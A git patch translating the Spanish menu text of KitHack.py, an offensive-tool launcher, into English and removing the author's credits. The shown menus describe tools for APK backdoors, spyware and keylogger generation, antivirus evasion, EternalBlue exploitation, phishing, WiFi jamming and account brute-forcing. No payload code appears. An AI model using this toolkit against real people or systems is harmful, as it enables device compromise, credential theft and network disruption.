From cce78dff8e46f9853a1cd1248422dc31d4838f54 Mon Sep 17 00:00:00 2001 From: insert edgy and cool name Date: Sat, 26 Feb 2022 23:13:29 +0100 Subject: [PATCH 1/6] Translated to English --- KitHack.py | 1296 ++++++++++++++++++++++++++-------------------------- 1 file changed, 643 insertions(+), 653 deletions(-) diff --git a/KitHack.py b/KitHack.py index 31fc301..0dccf46 100755 --- a/KitHack.py +++ b/KitHack.py @@ -21,16 +21,16 @@ from lib.network import run_network def check_connection(host='https://www.google.com'): - print("{}Verificando su conexion a internet...".format(GREEN)) + print("{}Checking your internet connection...".format(GREEN)) time.sleep(0.5) try: req = requests.get(host, timeout=15) if req.status_code == 200: - print("{}Conexion a internet exitosa.".format(GREEN)) + print("{}Internet connection successful.".format(GREEN)) time.sleep(0.5) pass except: - print("{0}[x]:{1} Verifique su conexion a internet.".format(RED, DEFAULT)) + print("{0}[x]:{1} Check your internet connection.".format(RED, DEFAULT)) exit(0) def check_permissions(): @@ -38,23 +38,13 @@ def check_permissions(): info() else: os.system('clear') - print("{0}[!]{1} ¡Permiso denegado! Recuerde ejecutar: {2}sudo {1}python3 KitHack.py".format(RED, DEFAULT, GREEN)) + print("{0}[!]{1} ¡Permission denied! Remember to run: {2}sudo {1}python3 KitHack.py".format(RED, DEFAULT, GREEN)) exit(0) def info(): os.system('clear') print("{0}[VERSION]:{1} 1.3.2\n\n".format(RED, DEFAULT)) time.sleep(0.5) - print("{0}[AUTOR]:{1} Adrian Guillermo\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[GITHUB]:{1} https://www.github.com/AdrMXR\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[FACEBOOK]:{1} https://www.facebook.com/adrian.Guillermo.22\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[INSTAGRAM]:{1} https://www.instagram.com/adrian.guillermo22\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[YOUTUBE]:{1} https://www.youtube.com/channel/UCqEtxJKbIghx6lyymrjfvnA\n".format(RED, DEFAULT)) - time.sleep(2.5) os.system('clear') def main(): @@ -65,16 +55,16 @@ def main(): if option == '01': os.system('clear') print ('========={0}Tool{1}==================================={0}Information{1}================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Backdoor-apk {2}Agrega una puerta trasera a cualquier archivo APK.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Evil-Droid {2}Genera puertas traseras para Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Spade {2}Script en python que genera una puerta trasera a cualquier APK.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} AhMyth {2}Herramienta de administración remota de Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Andspoilt {2}Ejecuta exploits interactivos de Android en Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Kwetza {2}Inyecta malware en aplicaciones android existentes.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Termux {2}Emulador de terminal Android basada en Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Android-Exploits {2}Coleccion de exploits y hacks Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Grabcam {2}Permite piratear la cámara de nuestras victimas con una página falsa.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Androidpatternlock {2}Permite obtener el patrón de bloqueo en dispositivos Android.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} Backdoor-apk {2}Add a backdoor to any APK file.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} Evil-Droid {2}Android Backdoor Generator Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} Spade {2}APK Backdoor Tool Made in Python.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} AhMyth {2}Android Remote Administration Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} Andspoilt {2}Run interactive Android exploits on Linux.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} Kwetza {2}Inject malware into existing Android apps.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} Termux {2}Linux based Android terminal emulator.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} Android-Exploits {2}Collection of Android exploits and hacks.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} Grabcam {2}Allows to hack the camera of our victims with a fake page.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} Androidpatternlock {2}Allows to get the pattern lock on Android devices.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -115,7 +105,7 @@ def main(): kitools.AndroidPatternLock() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -123,19 +113,19 @@ def main(): elif option == '02': os.system('clear') print ('========{0}Tool{1}================================================{0}Information{1}==================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} Winpayloads {2}Generador de payloads indetectables en Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} sAINT {2}Generador de spyware para sistemas Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} BeeLogger {2}Generador de Keyloggers gmail para Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} FakeImageExploiter {2}Inyecta malware en imagenes jpg para Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Koadic {2}Rootkit de Windows posterior a una explotacion.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Phantom Evasion {2}Herramienta de evasion de Antivirus.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Ps1encode {2}Generador y codificador de payloads basados en PowerShell.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} DKMC {2}Herramienta de evasion de carga maliciosa.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Cromos {2}Inyecta codigo en extensiones legitimas de Chrome Web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Eternal_scanner {2}Escáner para el exploit Eternal Blue y Eternal Romance.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} EternalblueDoublepulsar {2}Módulo de Metasploit para explotar la vulnerabilidad Eternalblue-Doublepulsar.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} EternalBlueWinXPWin10 {2}Modulo de Metasploit EternalBlue desde Windows XP SP2 hasta Windows 10 Pro.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Windows-Exploits {2}Coleccion de Exploits Windows.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} Winpayloads {2}Undetectable payload generator in Windows.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} sAINT {2}Spyware generator for Windows systems.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} BeeLogger {2}Gmail Keylogger Generator for Windows.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} FakeImageExploiter {2}Inject malware into jpg images for Windows.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} Koadic {2}Post-Exploit Windows Rootkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} Phantom Evasion {2}Antivirus Evasion Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} Ps1encode {2}PowerShell-based payload generator and encoder.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} DKMC {2}Malicious Payload Evasion Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} Cromos {2}Inject code into legitimate Chrome Web extensions.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} Eternal_scanner {2}Scanner for Eternal Blue and Eternal Romance exploit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}11){1} EternalblueDoublepulsar {2}Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}12){1} EternalBlueWinXPWin10 {2}Metasploit Module for EternalBlue from Windows XP SP2 to Windows 10 Pro.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}13){1} Windows-Exploits {2}Windows Exploits Collection.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -185,7 +175,7 @@ def main(): kitools.WindowsExploits() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -193,17 +183,17 @@ def main(): elif option == '03': os.system('clear') print ('======={0}Tool{1}======================================={0}Information{1}====================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} HiddenEye {2}Herramienta de phishing moderna con funcionalidad avanzada.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} PhishX {2}Generador de phishing y spoofing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} SocialPhish {2}Herramienta phishing con 32 plantillas + 1 personalizable.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} SocialFish {2}Herramienta educativa de phishing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} PhisherMan {2}Herramienta phishing con 17 plantillas y funcional con ngrok.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Spectre {2}Admite ataques de phishing casi con cualquier sitio web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Blackeye {2}Herramienta de phishing con 38 sitios web disponibles.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} PhEmail {2}Automatiza procesos de envío de correos electrónicos de phishing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Weeman {2}Servidor HTTP para phishing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Zphisher {2}Herramienta de phishing automatizada.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} AIOPhish {2}Herramienta phishing con diferentes opciones.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} HiddenEye {2}Modern phishing tool with advanced functionality.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} PhishX {2}Phishing and Spoofing Generator.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} SocialPhish {2}Phishing tool with 32 templates + 1 customizable.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} SocialFish {2}Phishing educational tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} PhisherMan {2}Phishing tool with 17 templates and working with ngrok.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} Spectre {2}Supports phishing attacks with almost any website.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} Blackeye {2}Phishing tool with 38 websites available.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} PhEmail {2}Automate phishing email delivery processes.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} Weeman {2}HTTP Server for Phishing.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} Zphisher {2}Automated phishing tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}11){1} AIOPhish {2}Phishing tool with different options.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -247,7 +237,7 @@ def main(): kitools.AIOPhish() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -255,26 +245,26 @@ def main(): elif option == '04': os.system('clear') print ('======={0}Tool{1}====================================={0}Information{1}======================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Fluxion {2}herramienta de auditoría de redes e ingeniería social.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Wifiphisher {2}herramienta que permite capturar contraseñas wifi mediante AP.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Wifibroot {2}herramienta wifi Pentest Cracking para WPA/WPA2. '.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Wifite {2}Ejecuta herramientas de auditoría inalámbrica existentes para usted.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Ettercap {2}Interceptor/sniffer/registrador para LANs con switch.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Linset {2}Herramienta de phishing WPA/WPA2.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} WiFi-Pumpkin {2}Framework de AP para crear facilmente redes falsas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Wifresti {2}Localiza tu contraseña de red inalámbrica en Windows, Linux y Mac OS.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Evil Limiter {2}Herramienta que limita el ancho de banda de los dispositivos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Netool-toolkit {2}Kit de herramientas de código abierto de pentesting de MitM.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Dracnmap {2}Herramienta que se utiliza para explotar redes y recopilar datos con nmap.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Airgeddon {2}Script en bash para auditar redes inalambricas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Routersploit {2}Se compone de varios módulos que ayudan a operar pruebas de penetracion.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} Eaphammer {2}Kit para realizar ataques dirigidos contra redes WPA2-Enterprise.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} VMR-MDK {2}Script para descifrar redes inalámbricas WPS.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Wirespy {2}Permite configurar honeypots rápidos para llevar a cabo MITMA.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} Wireshark {2}Analizador de redes que te permite capturar y navegar en el trafico de una red.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} SniffAir {2}Framework para pentesting inalámbrico.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} WifiJammer {2}Atasca continuamente todos los clientes/enrutadores wifi.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} KawaiiDeauther {2}Bloquea todos los clientes/enrutadores wifi.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} Fluxion {2}Network Auditing/Social Engineering Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} Wifiphisher {2}WiFi Password Capture Tool Using AP.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} Wifibroot {2}WPA/WPA2 WiFi Penetration Testing Tool. '.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} Wifite {2}Run existing wireless auditing tools for you.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} Ettercap {2}Interceptor/sniffer/logger for switched LANs .'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} Linset {2}WPA/WPA2 Phishing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} WiFi-Pumpkin {2}AP framework to easily create fake networks.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} Wifresti {2}Find your wireless network password on Windows, Linux and Mac OS.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} Evil Limiter {2}Device bandwidth limiting tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} Netool-toolkit {2}MitM pentesting open source toolkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}11){1} Dracnmap {2}Tool used to exploit networks and collect data with NMAP.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}12){1} Airgeddon {2}Bash script to audit wireless networks.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}13){1} Routersploit {2}Router Penetration Testing Modules.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}14){1} Eaphammer {2}Kit to perform targeted attacks against WPA2-Enterprise networks.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}15){1} VMR-MDK {2}Script to decrypt WPS wireless networks.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}16){1} Wirespy {2}Allows you to configure fast honeypots to carry out MITM.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}17){1} Wireshark {2}Network Capture/Analyzing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}18){1} SniffAir {2}Wireless Pentesting Framework.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}19){1} WifiJammer {2}WiFi Client/Router Jammer.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}20){1} KawaiiDeauther {2}WiFi DeAuth Attack Tool.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -345,7 +335,7 @@ def main(): kitools.KawaiiDeauther() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -353,19 +343,19 @@ def main(): elif option == '05': os.system('clear') print ('======={0}Tool{1}====================================={0}Information{1}================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Cupp {2}Permite crear diccionarios específicamente para una persona.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Facebooker {2}Script en perl que realiza fuerza bruta contra Facebook.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} BluForce-FB {2}Ataques de fuerza bruta en cuentas de Facebook.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Brut3k1t {2}Ataques de fuerza bruta contra una multitud de protocolos y servicios.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} SocialBox {2}Framework de fuerza bruta [Facebook, Gmail, Instagram, Twitter].'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} John The Ripper {2}Programa que aplica fuerza bruta para descifrar contraseñas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Hashcat {2}Herramienta para la recuperación de contraseñas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Brutedum {2}Ataca SSH, FTP, Telnet, PostgreSQL, RDP, VNC con Hydra, Medusa y Ncrack.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Facebash {2}Ataque de fuerza bruta para facebook en shellscript usando TOR.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Brutespray {2}Automatiza el escaneo de puertos y realiza ataques por fuerza bruta.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Pupi {2}Pupi es un generador de contraseñas simple a partir de información personal.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} B4r-brute {2}Script para crackear cuentas de Facebook usando la ID del usuario.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Fb-Hack {2}Script de recuperación y pirateo de contraseña de Facebook.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} Cupp {2}Allows you to create dictionaries specifically for a person.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} Facebooker {2}Facebook Password Bruteforcer Made in Perl.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} BluForce-FB {2}Facebook Password Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} Brut3k1t {2}Bruteforce Attack Kit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} SocialBox {2}Bruteforce Framework.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} John The Ripper {2}Password Bruteforcing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} Hashcat {2}Hash Cracking Toolkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} Brutedum {2}SSH/FTP/Telnet/PostgreSQL/RDP/VNC/Medusa Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} Facebash {2}Facebook Bruteforcer Made in Shellscript Using TOR.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} Brutespray {2}Port Scanner/Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}11){1} Pupi {2}Password Generator Using Personal Information.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}12){1} B4r-brute {2}Facebook Account Cracker Using User ID.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}13){1} Fb-Hack {2}Facebook Password "Hack"/Recovery Script.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -415,7 +405,7 @@ def main(): kitools.FbHack() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -423,22 +413,22 @@ def main(): elif option == '06': os.system('clear') print ('======={0}Tool{1}========================================={0}Information{1}========================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} SQLmap {2}Inyección SQL y toma de control de los servidores de bases de datos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} XAttacker {2}Escáner de vulnerabilidades de sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Fuxploider {2}Detecta técnicas favorables para cargar shells web o cualquier archivo malicioso.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Wordpresscan {2}Escáner de WordPress de vulnerabilidades.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} SiteBroker {2}Recopila información y automatiza pruebas de penetración en sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} NoSQLMap {2}Explotacion de debilidades de configuración predeterminadas en bases de datos NoSQL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Sqli-scanner {2}Escanear de sitios web vulnerables a la inyección de SQL destinado a una lista de URL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Joomscan {2}Permite escanear sitios web y detectar configuraciones erroneas o deficiencias.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Metagoofil {2}Extractor de metadatos de documentos públicos (pdf, doc, xls, ppt, etc.).'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Sublist3r {2}Herramienta rápida de enumeración de subdominios para probadores de penetración.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} WAFNinja {2}Programa que contiene dos funciones para atacar firewalls de aplicaciones web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Dirsearch {2}Diseñada para directorios y archivos de fuerza bruta en sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} XSStrike {2}El escáner XSS más avanzado.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} LinksF1nd3r {2}Extractor de componentes web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} D-TECT {2}Herramienta moderna para realizar pentesting en sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Phpsploit {2}Herramienta capaz de mantener el acceso a un servidor web comprometido.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} SQLmap {2}SQLi Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} XAttacker {2}Website Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} Fuxploider {2}Detect favorable techniques to load web shells or any malicious files.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} Wordpresscan {2}WordPress Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} SiteBroker {2}Information Collecting/Website Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} NoSQLMap {2}NoSQL Default Configuration Weakness Exploitation Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} Sqli-scanner {2}SQL Injection Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} Joomscan {2}Website Misconfiguration Scanner.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} Metagoofil {2}Metadata Extraction Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} Sublist3r {2}Subdomain Enumeration Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}11){1} WAFNinja {2}Web Application Firewall Attacker.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}12){1} Dirsearch {2}Directory/File Path Bruteforcing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}13){1} XSStrike {2}Advanced XSS Scanner.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}14){1} LinksF1nd3r {2}Web Component Extractor.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}15){1} D-TECT {2}Modern Website Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}16){1} Phpsploit {2}Tool capable of maintaining access to a compromised web server.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -497,7 +487,7 @@ def main(): kitools.Phpsploit() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -505,12 +495,12 @@ def main(): elif option == '07': os.system('clear') print ('======={0}Tool{1}====================================={0}Information{1}=================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} SpoofMAC {2}Permite modificar su direccion MAC para depurar.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Ip_spoofing {2}ARP spoofing, HTTP spoofing && Dos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Arpspoof {2}Ataque de falsificación de ARP utilizando sockets del kernel de Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} DerpNSpoof {2}Herramienta de suplantación de DNS simple.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} DrSpoof {2}Herramienta para detectar y detener ataques ARP Spoofing en su red local.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} GODKILLER {2}SMS-BOMBER y SMS-SENDER.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} SpoofMAC {2}MAC Address Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} Ip_spoofing {2}ARP/HTTP Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} Arpspoof {2}ARP Spoofing Attacl Tool Using Linux Kernel Sockets.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} DerpNSpoof {2}Simple DNS Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} DrSpoof {2}ARP Spoofing Detection Tool For Local Networks.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} GODKILLER {2}SMS Bomber/Sender.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -539,7 +529,7 @@ def main(): kitools.GODKILLER() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -547,26 +537,26 @@ def main(): elif option == '08': os.system('clear') print ('========={0}Tool{1}========================================{0}Information{1}========================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} NMAP {2}Obtiene información de los host, puertos y servicios dentro de una red.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Th3inspector {2}Herramienta todo en uno para recopilar información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} FBI {2}Recopilación de información confidencial en cuentas de Facebook.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Infoga {2}Extrae información de cuentas de correo electrónico.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Crips {2}Obtiene información sobre direcciones IP, paginas web y registros DNS.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} BillCipher {2}Recopilación de información para un sitio web o direccion IP.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} RED_HAWK {2}Herramienta para recopilar información, escanear vulnerabilidades y rastreo.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Recon-ng {2}Herramienta precargada con gran cantidad de modulos para recopilar información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} theHarvester {2}Recopilación de correos electrónicos, nombres, subdominios, direcciones IP y URL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} PhoneInfoga {2}Obtiene información sobre numeros de telefono utilizando recursos gratuitos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Gasmask {2}Herramienta de recopilación de información todo en uno.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} URLextractor {2}Recopilación de información y reconocimiento de sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Devploit {2}Busqueda de DNS, Whois, IP, GeoIP, subred, puertos, host, etc.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} ReconDog {2}Herramienta todo en uno para recopilar información básica.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} Webkiller {2}Kit de recopilación de información.'.format(WHITE, YELLOW, DEFAULT)) - print 